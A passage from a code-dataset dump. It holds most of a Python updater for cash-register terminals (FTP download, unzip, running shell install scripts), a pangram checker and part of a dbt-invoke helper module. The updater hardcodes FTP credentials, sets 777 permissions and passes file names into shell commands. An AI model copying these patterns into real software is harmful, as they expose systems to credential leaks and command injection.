os.remove(local_path_log)\r\n\r\n def upload_error_task(self, name, path):\r\n \"\"\" This function connect to FTP and upload new task, because no correct install update. 
\"\"\"\r\n try:\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.cwd(path)\r\n with open(name, 'rb') as file:\r\n response_upload_log = self.connect_ftp.storlines(\"STOR \" + name, file)\r\n logger.info('Upload in FTP error task {}'.format(name))\r\n if not response_upload_log.startswith(\"226 Transfer complete\"):\r\n with open(name, 'rb') as file:\r\n self.connect_ftp.storlines(\"STOR \" + name, file)\r\n except ftplib.all_errors as ftp_error:\r\n logger.exception('Error connect to FTP\\n {}'.format(ftp_error))\r\n raise ConnectionError\r\n except Exception as all_error:\r\n logger.error('Error Upload error task: {}'.format(all_error))\r\n raise ConnectionError\r\n\r\n def del_task(self, task, path):\r\n \"\"\" This function connect to FTP and delete task. \"\"\"\r\n try:\r\n self.connect_ftp = ftplib.FTP(self.key_ftp_host, self.key_ftp_user, self.ftp_pass)\r\n self.connect_ftp.encoding = 'UTF-8'\r\n self.connect_ftp.cwd(path)\r\n self.connect_ftp.delete(task)\r\n self.connect_ftp.close()\r\n except Exception as del_error:\r\n logger.error('Error delete task: {} in ftp\\n{}'.format(task, del_error))\r\n\r\n\r\ndef show_message(title, message):\r\n \"\"\" This function create message box. \"\"\"\r\n try:\r\n global console\r\n if not console:\r\n root = Tk()\r\n root.withdraw()\r\n messagebox.showinfo(title, message)\r\n root.destroy()\r\n else:\r\n logger.critical(\"{}\\n{}\".format(title, message))\r\n except Exception as fail:\r\n logger.critical(\"Error tkinter message\\n {}\".format(fail))\r\n\r\n\r\ndef copy_file(name_file, path):\r\n \"\"\" This function copy file. \"\"\"\r\n try:\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n shutil.copy(name_file, path)\r\n except OSError as os_error:\r\n logger.exception('Error copy file: {}\\n Exit script.'.format(os_error))\r\n raise SystemExit(\"ошибка при копировании файлов\\nСмотрите лог файл\")\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n\r\n\r\ndef get_update_name(flash, name, path_task_in_ftp):\r\n \"\"\" This function search update name in FTP or flash card. 
\"\"\"\r\n\r\n def update_name_in_flash(path_upd_in_flash):\r\n updates_list = []\r\n list_updates_in_flash = os.listdir(path_upd_in_flash)\r\n for element in list_updates_in_flash:\r\n if element.endswith('.zip'):\r\n updates_list.append(element)\r\n list_updates_in_flash = sorted(updates_list, reverse=True)\r\n name_update = list_updates_in_flash[0]\r\n logger.info('Flash found update {}'.format(name_update))\r\n return name_update\r\n\r\n def update_name_in_ftp(name_system, path_task):\r\n list_updates_for_install = []\r\n count_task = 0\r\n try:\r\n list_task = FtpClient(ftp_path=path_task).path_list\r\n except Exception as fail:\r\n raise ConnectionError(fail)\r\n for task in list_task:\r\n if task.split(\"_\")[0] == name_system and task.endswith('.new_task'):\r\n count_task += 1\r\n logger.error('Found task in Ftp server: {}'.format(task))\r\n list_updates_for_install.append(task.split('_')[1].split('.')[0])\r\n if count_task == 0:\r\n logger.error('NO updates file found on Ftp server for: Terminal Number({})'.format(system_name))\r\n return list_updates_for_install\r\n\r\n try:\r\n if not flash:\r\n update_name_to_install = update_name_in_ftp(name, path_task_in_ftp)\r\n else:\r\n update_name_to_install = update_name_in_flash(flash)\r\n return update_name_to_install\r\n except IndexError as index_err:\r\n logger.error(index_err)\r\n except ConnectionError as connect_error:\r\n raise ConnectionError(connect_error)\r\n except Exception as all_error:\r\n raise Exception(all_error)\r\n\r\n\r\ndef download_arch_updates(flash, updates_name, ftp_path_updates):\r\n \"\"\" This function connect to FTP and download zip arch update. \"\"\"\r\n local_path_upd_file = \"{}/{}\".format(flash, updates_name)\r\n\r\n os.makedirs(tmp_catalog_for_install_updates, mode=0o0777)\r\n if not flash:\r\n download_update = FtpClient(ftp_path=ftp_path_updates)\r\n list_upd = download_update.path_list\r\n logger.info('Updates in FTP server\\n{}'.format(list_upd))\r\n for download_name in updates_name:\r\n logger.info(\"{}.zip\".format(download_name))\r\n if \"{}.zip\".format(download_name) in list_upd:\r\n download_update.download_upd(download_name)\r\n logger.info('Successfully download {}'.format(download_name))\r\n ftp_task_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n download_update.del_task(\"{}_{}.new_task\".format(system_name, download_name.split(\".\")[0]),\r\n ftp_task_path)\r\n else:\r\n logger.info('Updates not found in updates list')\r\n raise SystemExit(\"Обновления не найдены\")\r\n else:\r\n copy_file(local_path_upd_file, tmp_catalog_for_install_updates)\r\n logger.info('{} copied to {}'.format(updates_name, tmp_catalog_for_install_updates))\r\n\r\n\r\ndef unzip_upd(path):\r\n for name in os.listdir(path):\r\n name_path_upd = name.split(\".\")[0]\r\n full_path_upd = \"{}/{}\".format(path, name_path_upd)\r\n upd_zip = \"{}/{}\".format(path, name)\r\n if not os.path.exists(full_path_upd):\r\n os.makedirs(full_path_upd)\r\n try:\r\n with zipfile.ZipFile(upd_zip, 'r') as result_zip:\r\n logger.info('Open Zip {}'.format(name))\r\n result_zip.extractall(full_path_upd)\r\n logger.info('Successfully unzip: {}'.format(name))\r\n except zipfile.BadZipFile as zip_error:\r\n logger.exception('Bad Zip\\n{}'.format(zip_error))\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n finally:\r\n os.remove(upd_zip)\r\n\r\n\r\ndef search_local_upd_for_install(enable_flash, path):\r\n list_result = []\r\n final_result = []\r\n for name_path in 
os.listdir(path):\r\n result_install = install_upd(\"{}/{}\".format(path, name_path), enable_flash)\r\n list_result.append(\"{}={}\".format(name_path, result_install))\r\n shutil.rmtree(tmp_catalog_for_install_updates)\r\n os.chdir(path_for_this_script)\r\n for result_upd in list_result:\r\n if result_upd.find('Fail_CU_Fail_PC') != -1:\r\n final_result.append(\"{} = Установка не удалась, смотрите лог-файл\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.find('Fail_CU_0') != -1:\r\n final_result.append(\"{} = Блок управления(Ошибка), Касса(Успешно)\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.find('0_Fail_PC') != -1:\r\n final_result.append(\"{} = Блок управления(Успешно), Касса(Ошибка)\".format(result_upd.split(\"=\")[0]))\r\n if result_upd.split('=')[1] == '0':\r\n final_result.append(\"{} = Успешно\".format(result_upd.split(\"=\")[0]))\r\n final_result = '\\n'.join(result for result in final_result)\r\n show_message('Результат обновления', \"{}\".format(final_result))\r\n\r\n\r\ndef install_upd(path_name, enable_flash):\r\n global tmp_log, unload_ftp\r\n\r\n def search_install_log(path):\r\n log = ''\r\n if path != \"/home/cblock/\":\r\n os.chdir(path.split('_')[1])\r\n for file_log in os.listdir(path):\r\n if not file_log.find('.log') == -1:\r\n with open(\"./{}/{}\".format(path, file_log), 'r') as file:\r\n log = file.read()\r\n else:\r\n os.chdir(path)\r\n for file_log in os.listdir(path):\r\n if not file_log.find('.log') == -1:\r\n os.system('sudo -u cblock chmod 777 {}'.format(file_log))\r\n with open(\"{}{}\".format(path, file_log), 'r') as file:\r\n log = file.read()\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return log\r\n\r\n def install_pc(name_upd_pc):\r\n result_installation_pc = 0\r\n path_upd_name = name_upd_pc.split(\".\")[0]\r\n name_update = path_upd_name.split('_')[1]\r\n for file in os.listdir(path_upd_name):\r\n os.chmod(\"{}/{}\".format(path_upd_name, file), 0o0777)\r\n logger.info('Chmod 777 {}/{}'.format(path_upd_name, file))\r\n os.chdir(path_upd_name)\r\n start_upd = Popen('./{}.sh'.format(name_update), shell=True, stdout=PIPE, stderr=PIPE)\r\n start_upd.wait()\r\n stdout_log = start_upd.communicate()[1].decode()\r\n if not start_upd.returncode == 0:\r\n logger.error('Error install UPD {}.sh,\\nError:\\n{}.'.format(name_update, stdout_log))\r\n result_installation_pc = 1\r\n else:\r\n logger.info('Successfully install: {}.sh'.format(name_update))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_pc\r\n\r\n def install_old_pc(path_upd_name):\r\n result_installation_pc = 0\r\n upd_name = path_upd_name.split('/')[-1]\r\n for file in os.listdir(path_upd_name):\r\n os.chmod(\"{}/{}\".format(path_upd_name, file), 0o0777)\r\n logger.info('Chmod 777 {}/{}'.format(path_upd_name, file))\r\n os.chdir(path_upd_name)\r\n os.getcwd()\r\n start_upd = Popen('./{}.sh'.format(upd_name), shell=True, stdout=PIPE, stderr=PIPE)\r\n start_upd.wait()\r\n stdout_log = start_upd.communicate()[1].decode()\r\n if not start_upd.returncode == 0:\r\n logger.error('Error install UPD {}.sh,\\nError:\\n{}.'.format(upd_name, stdout_log))\r\n result_installation_pc = 1\r\n else:\r\n logger.info('Successfully install: {}.sh'.format(upd_name))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_pc\r\n\r\n def install_cu(name_upd_cb, flash=False):\r\n result_installation_cb = 0\r\n path_upd_name = name_upd_cb.split(\".\")[0]\r\n for file in os.listdir(path_upd_name):\r\n upd_dir_name = file.split('.')[0]\r\n 
copy_file(\"{}/{}\".format(path_upd_name, file), path_to_install_CU)\r\n logger.info(\"{} copy to /home/cblock/\".format(file))\r\n try:\r\n if requests.get('http://{}/comm.php'.format(parameters_ini.get('Global', 'host_cu')), timeout=5).ok:\r\n connect = requests.post(\r\n 'http://{}/comm.php'.format(parameters_ini.get('Global', 'host_cu')),\r\n ''\r\n 'AutoUpdateFTP://cblock:kcolbc@XXX.XXX.XXX.XXX//'\r\n '/home/cblock'\r\n '{}'\r\n ''.format(file)\r\n )\r\n\r\n os.remove(\"{}/{}\".format(path_to_install_CU, file))\r\n logger.info(\"delete /home/cblock/{}\".format(file))\r\n response_xml = minidom.parseString(connect.text)\r\n if response_xml.getElementsByTagName('ErrorDesc'):\r\n logger.info('Error response CU:\\n {}'.format(connect.text))\r\n result_installation_cb = 1\r\n else:\r\n logger.info('Successfully install in CU ==> {}'.format(upd_dir_name))\r\n except Exception as request_error:\r\n show_message('Ошибка', 'Ошибка при загрузке обновления в Блок управления.\\n\\n{}'.format(request_error))\r\n logger.exception('Error response CU\\n{}'.format(request_error))\r\n result_installation_cb = 1\r\n if not flash:\r\n ftp_task_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n unload_ftp.del_task(\"{}_{}.new_task\".format(system_name, path_upd_name.split(\"_\")[1]), ftp_task_path)\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_installation_cb\r\n\r\n def unzip_update(name):\r\n with zipfile.ZipFile(name, 'r') as result_zip:\r\n logger.info('Open Zip {}'.format(name))\r\n result_zip.extractall(name.split(\".\")[0])\r\n result_zip.close()\r\n logger.info('Successfully unzip: {}'.format(name))\r\n os.remove(name)\r\n\r\n result_install = 0\r\n result_install_cu = 0\r\n result_install_pc = 0\r\n ftp_path = parameters_ini.get('Global', 'ftp_path_logs')\r\n try:\r\n tmp_log = ''\r\n if not enable_flash:\r\n unload_ftp = FtpClient(ftp_path=ftp_path)\r\n if len(cash_ini.get('GLOBAL', 'TerninalNumber')) == 8:\r\n # If len terminal number == 8, start upd from old KSA\r\n # os.chdir(path_name)\r\n result_install = install_old_pc(path_name)\r\n for file_log in os.listdir(path_name):\r\n if not file_log.find('.log') == -1:\r\n with open(\"./{}/{}\".format(path_name, file_log), 'r') as file:\r\n tmp_log += file.read()\r\n if result_install != 0:\r\n result_install = 'Fail_PC'\r\n else:\r\n # If len terminal number != 8, start upd from new KSA\r\n for name_upd in os.listdir(path_name):\r\n os.chdir(path_name)\r\n if name_upd.startswith(\"CU\"):\r\n unzip_update(name_upd)\r\n result_install_cu = install_cu(name_upd, enable_flash)\r\n tmp_log += search_install_log(name_upd.split('.')[0])\r\n tmp_log += search_install_log(\"/home/cblock/\")\r\n if result_install_cu != 0:\r\n result_install_cu = 'Fail_CU'\r\n elif name_upd.startswith(\"PC\"):\r\n unzip_update(name_upd)\r\n result_install_pc = install_pc(name_upd)\r\n tmp_log += search_install_log(name_upd.split('.')[0])\r\n tmp_log += search_install_log(\"/home/cblock/\")\r\n if result_install_pc != 0:\r\n result_install_pc = 'Fail_PC'\r\n if result_install != result_install_cu or result_install != result_install_pc:\r\n result_install = '{}_{}'.format(result_install_cu, result_install_pc)\r\n upd_path = (name_upd.split('.')[0]).split('_')[1]\r\n new_task = '{}_({})_{}'.format(result_install, system_name, upd_path)\r\n if not enable_flash:\r\n file_task = open(new_task, \"w\")\r\n file_task.close()\r\n ftp_path = parameters_ini.get('Global', 'ftp_path_tasks')\r\n unload_ftp.upload_error_task(new_task, ftp_path)\r\n else:\r\n 
logger.info(new_task)\r\n if tmp_log:\r\n log_name = \"/home/cashier/scripts/Admin_updater/Log/{}.log\".format(path_name.split('/')[-1])\r\n with open(log_name, 'w') as upd_log:\r\n upd_log.write(tmp_log)\r\n if not enable_flash:\r\n unload_ftp.upload_log(log_name)\r\n else:\r\n copy_file(log_name, check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash))\r\n os.remove(log_name)\r\n else:\r\n log_name = \"/home/cashier/scripts/Admin_updater/Log/{}.log\".format(path_name.split('/')[-1])\r\n with open(log_name, 'w') as log:\r\n log.write('{} {} {} Result install {}'.format(path_name.split('/')[-1], time_upload_log, now_time,\r\n result_install))\r\n\r\n if not enable_flash:\r\n unload_ftp = FtpClient(ftp_path=ftp_path)\r\n unload_ftp.upload_log(log_name)\r\n with open(history_log, 'a') as history:\r\n history.write('\\n{} {} {} Result install {}'.format(path_name.split('/')[-1], time_upload_log, now_time,\r\n result_install))\r\n os.chdir(tmp_catalog_for_install_updates)\r\n return result_install\r\n except Exception as global_error:\r\n logger.exception('Unexpected error:\\n{}'.format(global_error))\r\n show_message(\"Ошибка\", global_error)\r\n raise SystemExit(global_error)\r\n\r\n\r\ndef gui_module():\r\n global console, check_flash\r\n\r\n def select_close():\r\n try:\r\n logger.info('Close program')\r\n raise SystemExit\r\n except Exception as errors:\r\n logger.error('Error \\n {}'.format(errors))\r\n\r\n def read_list_upd():\r\n try:\r\n updates_list = FtpClient(ftp_path=ftp_path_upd)\r\n updates_comments = parameters_ini.get('Global', 'upd_comments')\r\n updates_list.download_upd(updates_comments, ini=True)\r\n updates_comments = handling_settings.read_ini(updates_comments, 'cp1251')\r\n \"\"\"This is function connects to ftp server, reads list\r\n of available updates for installation,\r\n and displays the user in a listbox for selection.\"\"\"\r\n\r\n listbox.delete(0, END)\r\n for name_update in updates_list.path_list:\r\n if name_update.endswith('.zip') and updates_comments.has_option('Global', name_update):\r\n listbox.insert(END, (\"{} = {}\".format(name_update, updates_comments.get('Global', name_update))))\r\n except ftplib.all_errors as ftp_error:\r\n logger.error('Error \\n {}'.format(ftp_error))\r\n\r\n def download_update():\r\n global console, check_flash\r\n if listbox.curselection():\r\n value = listbox.curselection()\r\n status_bar['value'] = 20\r\n status_bar.update()\r\n name = listbox.get(value)\r\n status_bar['value'] = 40\r\n status_bar.update()\r\n logger.info(\"Key {}\".format(name))\r\n console = False\r\n check_flash = False\r\n download_arch_updates(check_flash, [name.split(\".zip\")[0]], ftp_path_upd)\r\n status_bar['value'] = 60\r\n status_bar.update()\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n status_bar['value'] = 80\r\n status_bar.update()\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n status_bar['value'] = 100\r\n status_bar.update()\r\n else:\r\n show_message('Ошибка', 'Не выбрано обновление для установки.')\r\n\r\n def auto_install():\r\n global console, check_flash\r\n logger.info(\"Not found key\")\r\n console = False\r\n status_bar['value'] = 20\r\n status_bar.update()\r\n check_flash = check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash)\r\n status_bar['value'] = 30\r\n status_bar.update()\r\n name_update = get_update_name(check_flash, system_name, ftp_path_task)\r\n status_bar['value'] = 40\r\n status_bar.update()\r\n\r\n if name_update:\r\n 
download_arch_updates(check_flash, name_update, ftp_path_upd)\r\n status_bar['value'] = 60\r\n status_bar.update()\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n status_bar['value'] = 80\r\n status_bar.update()\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n else:\r\n show_message(\"Ошибка\", \"Обновления для этой кассы\\nне найдены\")\r\n\r\n status_bar['value'] = 100\r\n status_bar.update()\r\n\r\n def get_help():\r\n reference = '''Данная программа предназначена для просмотра \\n\r\n и установки доступных обнавлений. Кассовой программы и оборудования.\\n \r\n Принцип работы:\\n\r\n 1. Выбрать из списка доступных обновлений.\\n\r\n 2. Нажать на кнопку Скачать и установить обновление\\n\r\n 3. Ждать сообщения о результате установке '''\r\n window_help = Toplevel()\r\n window_help.title(\"Справка\")\r\n window_help.wm_geometry(\"%dx%d+%d+%d\" % (625, 330, 0, 0))\r\n window_help = Label(window_help, text=reference, width=75, height=15, font=('Times', 12), bg='white')\r\n window_help.place(x=10, y=10)\r\n\r\n root = Tk()\r\n root.title(\"Администратор обновлений\")\r\n root.wm_geometry(\"%dx%d+%d+%d\" % (1130, 560, 0, 0))\r\n root.resizable(width=False, height=False)\r\n update_list_upd_button = Button(root, text=\"Обновить список доступных обновлений\", command=read_list_upd,\r\n activebackground='light blue', relief=GROOVE, fg=\"black\", font='times 11')\r\n update_list_upd_button.place(relx=0.83, rely=0.04, anchor=\"c\")\r\n update_list_upd_button.config(width=39)\r\n download_upd_button = Button(root, text=\"Скачать и установить обновление\", command=download_update,\r\n activebackground='light blue', relief=GROOVE, fg=\"black\", font='times 11')\r\n download_upd_button.place(relx=0.83, rely=0.1, anchor=\"c\")\r\n download_upd_button.config(width=39)\r\n auto_upd_button = Button(root, text=\"Автоматический поиск и установка\\n обновлений\", command=auto_install,\r\n relief=GROOVE, activebackground='light blue', font='times 11')\r\n auto_upd_button.place(relx=0.83, rely=0.22, anchor=\"c\")\r\n auto_upd_button.config(width=39)\r\n help_button = Button(root, text=\"Справка\", command=get_help, activebackground='light blue',\r\n relief=GROOVE, fg=\"black\", font='times 11')\r\n help_button.place(relx=0.79, rely=0.96, anchor=\"c\")\r\n help_button.config(width=15)\r\n btn_close = Button(root, text='Выход', relief=GROOVE, command=select_close,\r\n activeforeground='white', activebackground='#b20101', font='times 11')\r\n btn_close.place(relx=0.91, rely=0.96, anchor=\"c\")\r\n btn_close.config(width=15)\r\n scroll = Scrollbar(root)\r\n scroll.pack(side=LEFT, fill=Y)\r\n listbox = Listbox(root, width=75, height=25, yscrollcommand=scroll.set, font=('Courier', 12),\r\n selectbackground='light blue')\r\n status_bar = ttk.Progressbar(root, value=0, orient=\"horizontal\", mode=\"determinate\", length=300)\r\n status_bar.place(relx=0.83, rely=0.3, anchor=\"c\")\r\n listbox.place(x=14, y=10)\r\n scroll.config(command=listbox.yview)\r\n edit_menu = Menu(listbox, tearoff=0)\r\n edit_menu.add_command(label=\"Cut\", accelerator=\"Ctrl+X\", command=lambda: listbox.event_generate('<>'))\r\n edit_menu.add_command(label=\"Copy\", accelerator=\"Ctrl+C\", command=lambda: listbox.event_generate('<>'))\r\n edit_menu.add_command(label=\"Paste\", accelerator=\"Ctrl+V\", command=lambda: listbox.event_generate('<>'))\r\n listbox.bind(\"\", lambda event: edit_menu.post(event.x_root, event.y_root))\r\n\r\n read_list_upd()\r\n\r\n root.mainloop()\r\n\r\n\r\nif __name__ == 
\"__main__\":\r\n try:\r\n \"\"\"Get settings\"\"\"\r\n parameters_ini = handling_settings.read_ini(parameters_file, 'utf-8')\r\n ini_file_cash_main = parameters_ini.get('Global', 'ini_file_cash_main')\r\n handling_settings.check_ini_file_on_duplicate_parameters(ini_file_cash_main, 'TerninalNumber')\r\n handling_settings.check_ini_no_valid_string(ini_file_cash_main)\r\n cash_ini = handling_settings.read_ini(ini_file_cash_main, 'cp1251')\r\n ftp_path_task = parameters_ini.get('Global', 'ftp_path_tasks')\r\n ftp_path_upd = parameters_ini.get('Global', 'ftp_path_upd')\r\n upd_path_in_flash = parameters_ini.get('Global', 'upd_path_in_flash')\r\n # handling_settings.check_ini_file_on_duplicate_parameters(ini_file_cash_main, 'TerninalNumber')\r\n # handling_settings.check_ini_no_valid_string(ini_file_cash_main)\r\n system_name = cash_ini.get('GLOBAL', 'TerninalNumber')\r\n\r\n bar = ProgressBar(maxval=80, widgets=['PROGRESS :', Percentage(), ' ', Bar(marker='#', left='[', right=']')],\r\n term_width=80).start()\r\n\r\n\r\n def auto_search(terminal):\r\n status_flash = check_flash_card_connection.search_flash(system_path_media, upd_path_in_flash)\r\n name_update = get_update_name(status_flash, system_name, ftp_path_task)\r\n\r\n if name_update:\r\n if not terminal:\r\n show_message(\"Установка обновления\", \"Найдено обновление\\n{}\\nУстановить?\".format(name_update))\r\n\r\n bar.update(20)\r\n download_arch_updates(status_flash, name_update, ftp_path_upd)\r\n bar.update(40)\r\n unzip_upd(tmp_catalog_for_install_updates)\r\n bar.update(60)\r\n search_local_upd_for_install(status_flash, tmp_catalog_for_install_updates)\r\n bar.finish()\r\n else:\r\n if not terminal:\r\n show_message('Ошибка', 'Обновления не найдены')\r\n raise SystemExit(\"Обновления не найдены\")\r\n\r\n\r\n if os.path.exists('Log'):\r\n handling_logs.archiving_logs('Log')\r\n\r\n if os.path.exists(tmp_catalog_for_install_updates):\r\n logger.info('Found {}'.format(tmp_catalog_for_install_updates))\r\n shutil.rmtree(tmp_catalog_for_install_updates)\r\n logger.info('Remove {}'.format(tmp_catalog_for_install_updates))\r\n\r\n for file_log in os.listdir(path_to_install_CU):\r\n if not file_log.find('.log') == -1:\r\n os.system('rm /{}/{}'.format(path_to_install_CU, file_log))\r\n\r\n logger.info('Terminal Number ==> {}'.format(system_name))\r\n\r\n if key_parser.parse_args().list:\r\n console = True\r\n upd_list = []\r\n logger.info(\"Key {}\".format(namespace.list))\r\n ftp_list = FtpClient(ftp_path=ftp_path_upd)\r\n upd_comments = parameters_ini.get('Global', 'upd_comments')\r\n ftp_list.download_upd(upd_comments, ini=True)\r\n upd_comments = handling_settings.read_ini(upd_comments, 'cp1251')\r\n for upd_name in ftp_list.path_list:\r\n if upd_name.endswith('.zip') and upd_comments.has_option('Global', upd_name):\r\n logger.info(\"{} = {}\".format(upd_name, upd_comments.get('Global', upd_name)))\r\n upd_list.append((upd_name, upd_comments.get('Global', upd_name)))\r\n elif key_parser.parse_args().window:\r\n console = False\r\n gui_module()\r\n elif key_parser.parse_args().start_user:\r\n console = False\r\n auto_search(console)\r\n elif key_parser.parse_args().version:\r\n print(version)\r\n elif not namespace.update:\r\n console = True\r\n auto_search(console)\r\n else:\r\n logger.info(\"Key {}\".format(namespace.update))\r\n console = True\r\n check_flash = False\r\n update_name = [namespace.update]\r\n bar.update(20)\r\n download_arch_updates(check_flash, update_name, ftp_path_upd)\r\n bar.update(40)\r\n 
unzip_upd(tmp_catalog_for_install_updates)\r\n bar.update(60)\r\n search_local_upd_for_install(check_flash, tmp_catalog_for_install_updates)\r\n bar.finish()\r\n\r\n except ConnectionError:\r\n show_message('Ошибка', 'Ошибка подключения к FTP-серверу.\\n\\n'\r\n 'Если вы хотите установить обновление с флеш-накопителя.Его необходимо смонтировать.')\r\n\r\n logger.exception('Ошибка подключения к FTP-серверу.\\n\\nЕсли вы хотите установить обновление с накопителя. '\r\n 'Его необходимо смонтировать.')\r\n except FileNotFoundError as error:\r\n show_message('Ошибка', 'На флеш-накопителе, не найден каталог с обновлениями.\\nПрограмма ищет их в каталоге {}'\r\n .format(parameters_ini.get('Global', 'upd_path_in_flash')))\r\n logger.exception('{}\\nНа флеш-накопителе, не найден каталог с обновлениями.Программа ищет их в каталоге{}'\r\n .format(error, parameters_ini.get('Global', 'upd_path_in_flash')))\r\n except Exception as error:\r\n show_message('Ошибка', 'Не известная ошибка\\n\\n {}'.format(error))\r\n logger.exception('Не известная ошибка:\\n{}'.format(error))\r\n except SystemExit as err:\r\n logger.error(err)\r\n","sub_path":"search_for_updates.py","file_name":"search_for_updates.py","file_ext":"py","file_size_in_byte":35736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30921363","text":"import string\r\n\r\ncount = 0\r\ns = input('Enter a string: ').lower()\r\nli = [0] * 26\r\nfor i in s:\r\n if i in string.ascii_letters:\r\n li[ord(i) - 97] += 1\r\n\r\nprint(li)\r\n\r\nfor i in li:\r\n if i == 0:\r\n print('Not Pangram')\r\n break\r\nelse:\r\n print('Pangram')\r\n\r\n#Enter a string: A quick brown fox jumps over the lazy dog","sub_path":"Python_code/Pangram.py","file_name":"Pangram.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193184035","text":"import json\nimport logging\nfrom pathlib import Path\nimport sys\n\nimport yaml\n\nfrom dbt.task.base import get_nearest_project_dir\n\nMACROS = {\n '_log_columns_list': (\n \"\\n{# This macro is intended for use by dbt-invoke #}\"\n \"\\n{% macro _log_columns_list(sql=none, resource_name=none) %}\"\n \"\\n {% if sql is none %}\"\n \"\\n {% set sql = 'select * from ' ~ ref(resource_name) %}\"\n \"\\n {% endif %}\"\n \"\\n {% if execute %}\"\n \"\\n {{ log(get_columns_in_query(sql), info=True) }}\"\n \"\\n {% endif %}\"\n \"\\n{% endmacro %}\\n\"\n )\n}\nDBT_LS_ARG_HELP = (\n 'An argument for listing dbt resources (run \"dbt ls --help\" for details)'\n)\nDBT_LS_ARGS = {\n 'resource_type': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'select': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'models': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'exclude': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'selector': {'help': DBT_LS_ARG_HELP, 'resource_selector': True},\n 'project_dir': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'profiles_dir': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'profile': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'target': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'vars': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'bypass_cache': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n 'state': {'help': DBT_LS_ARG_HELP, 'resource_selector': False},\n}\n\n\ndef get_logger(name, level='INFO'):\n \"\"\"\n Create a logger\n\n :param name: The name of the logger 
to create\n :param level: One of Python's standard logging levels\n (DEBUG, INFO, WARNING, ERROR, CRITICAL)\n :return: A logging.Logger object\n \"\"\"\n logger = logging.getLogger(name)\n if logger.hasHandlers():\n logger.handlers.clear()\n handler = logging.StreamHandler(stream=sys.stdout)\n formatter = logging.Formatter(\n '{name} | {levelname:^8} | {message}', style='{'\n )\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(level.upper())\n return logger\n\n\ndef parse_yaml(location):\n \"\"\"\n Parse a yaml file\n\n :param location: The location of the yaml file to parse\n :return: The contents of the yaml file\n \"\"\"\n with open(location, 'r') as stream:\n try:\n parsed_yaml = yaml.safe_load(stream)\n return parsed_yaml\n except yaml.YAMLError as exc:\n sys.exit(exc)\n\n\ndef write_yaml(location, data):\n \"\"\"\n Write a yaml file\n\n :param location: The location to which to write the yaml file\n :param data: The object which will be written to the yaml file\n :return: None\n \"\"\"\n try:\n with open(location, 'w') as stream:\n yaml.safe_dump(data, stream, sort_keys=False)\n except yaml.YAMLError as exc:\n sys.exit(exc)\n\n\ndef get_project_info(ctx, project_dir=None):\n \"\"\"\n Get project level configurations for a dbt project\n and store them in ctx (an Invoke context object)\n\n :param ctx: An Invoke context object\n :param project_dir: A directory containing a dbt_project.yml file\n :return: None\n \"\"\"\n project = Project(project_dir)\n project_path = get_nearest_project_dir(project)\n project_yml_path = Path(project_path, 'dbt_project.yml')\n # Get project configuration values from dbt_project.yml\n # (or use dbt defaults)\n project_yml = parse_yaml(project_yml_path)\n project_name = project_yml.get('name')\n target_path = Path(project_path, project_yml.get('target-path', 'target'))\n compiled_path = Path(target_path, 'compiled', project_name)\n macro_paths = [\n Path(project_path, macro_path)\n for macro_path in project_yml.get('macro-paths', ['macros'])\n ]\n # Set context config key-value pairs\n ctx.config['project_path'] = project_path\n ctx.config['project_name'] = project_name\n ctx.config['target_path'] = target_path\n ctx.config['compiled_path'] = compiled_path\n ctx.config['macro_paths'] = macro_paths\n\n\ndef dbt_ls(\n ctx,\n supported_resource_types=None,\n hide=True,\n output='path',\n logger=None,\n **kwargs,\n):\n \"\"\"\n Run the \"dbt ls\" command with options\n\n :param ctx: An Invoke context object\n :param supported_resource_types: A list of supported resource types\n to default to if no resource selection arguments are given\n (resource_type, select, models, exclude, selector)\n :param hide: Whether to suppress command line logs\n :param output: An argument for listing dbt resources\n (run \"dbt ls --help\" for details)\n :param logger: A logging.Logger object\n :param kwargs: Additional arguments for listing dbt resources\n (run \"dbt ls --help\" for details)\n :return: A list of lines from stdout\n \"\"\"\n if not logger:\n logger = get_logger('')\n resource_selection_arguments = {\n arg: kwargs.get(arg)\n for arg, details in DBT_LS_ARGS.items()\n if details['resource_selector']\n }\n # Use default arguments if no resource selection arguments are given\n default_arguments = list()\n if not any(resource_selection_arguments.values()):\n default_arguments.append(f'--select {ctx.config[\"project_name\"]}')\n if supported_resource_types:\n for rt in supported_resource_types:\n 
